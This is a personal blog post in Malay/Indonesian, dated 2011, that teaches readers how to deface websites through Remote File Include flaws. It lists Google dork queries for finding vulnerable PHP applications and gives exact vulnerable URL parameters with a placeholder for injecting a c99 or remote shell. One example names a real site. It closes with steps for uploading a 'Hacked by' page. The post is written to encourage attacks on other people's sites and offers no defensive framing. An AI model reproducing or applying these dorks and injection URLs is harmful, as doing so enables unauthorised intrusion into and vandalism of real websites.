-->

☛SharinG is EasY☚

  • HomE
  • About Me
  • My Facebook
  • Join file split

J☢m B∃lajar D∃face W∃b Sit∃

Cara Mudah Deface Remote File Include

Sebelum kita bermula lebih baik juga kita mengetahui tentang Command command yang bermanfaat bagi kowang.
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
[EvilShellInject] = inject rshell / c99 kamu
Baiklah kita mula dengan PHP sebab PHP banyak sekali BUG nya..di antaranya :
Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com
- Site Oneadmin RFI
Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=
Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]
- PnPhpBB2
Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kowang suka atau kehendaki…
nah sekarang saya kasi contoh pathnya …http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]
- Support Ticket
Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kowang suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=
Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]
Hehehe Amacam banyak kan ? Nah selamat mencuba..
Nah setelah itu buadlah sebuad file: index.html
Isi dengan:
<html>
Hacked by Nama Kamu
</html>
Kemudian upload deh file ke directorynya
kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html
Enjoy

Label: HacKing

   

0 Comment:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Tentang Saya

My photo
Mohd Azmi
Don't worry about the future, ALLAH has already planned for it. Wechat : iamazmie Twitter : @iamazmie
View my complete profile
Related Posts Plugin for WordPress, Blogger...

Jom TinGok!

  • AniMe (7)
  • Cerita Lucu (2)
  • HacKing (1)
  • Hindi Movie (1)
  • Indo Movie (1)
  • Movie (24)
  • Movie Malay (3)
  • PreMium Account (3)
  • TiPs And Trick (7)
  • Trick Games (2)

Translate This Blog

English French German Spain

Italian Dutch Russian Brazil

Japanese Korean Arabic Chinese Simplified
By Me by Google

-->Like<--

Blog Archive

  • ► 2012 (4)
    • ► April (2)
    • ► January (2)
  • ▼ 2011 (48)
    • ► December (5)
    • ► November (19)
    • ► August (11)
    • ► July (5)
    • ▼ June (4)
      • AnDa Penat DgaN KelaJuan Broadband aNda ?????
      • J☢m B∃lajar D∃face W∃b Sit∃
      • Epic MoviE 2007
      • VideO no BufferIng!!!
    • ► May (4)

Total Page views

Related Posts Plugin for WordPress, Blogger...

☠Who Visit My BloG☠

ShiniGami KorusAki Azmi. Powered by Blogger.

Followers

Feedjit

☛SharinG is EasY☚ © 2008. Free Blogspot Templates Sponsored by: Tutorial87 Commentcute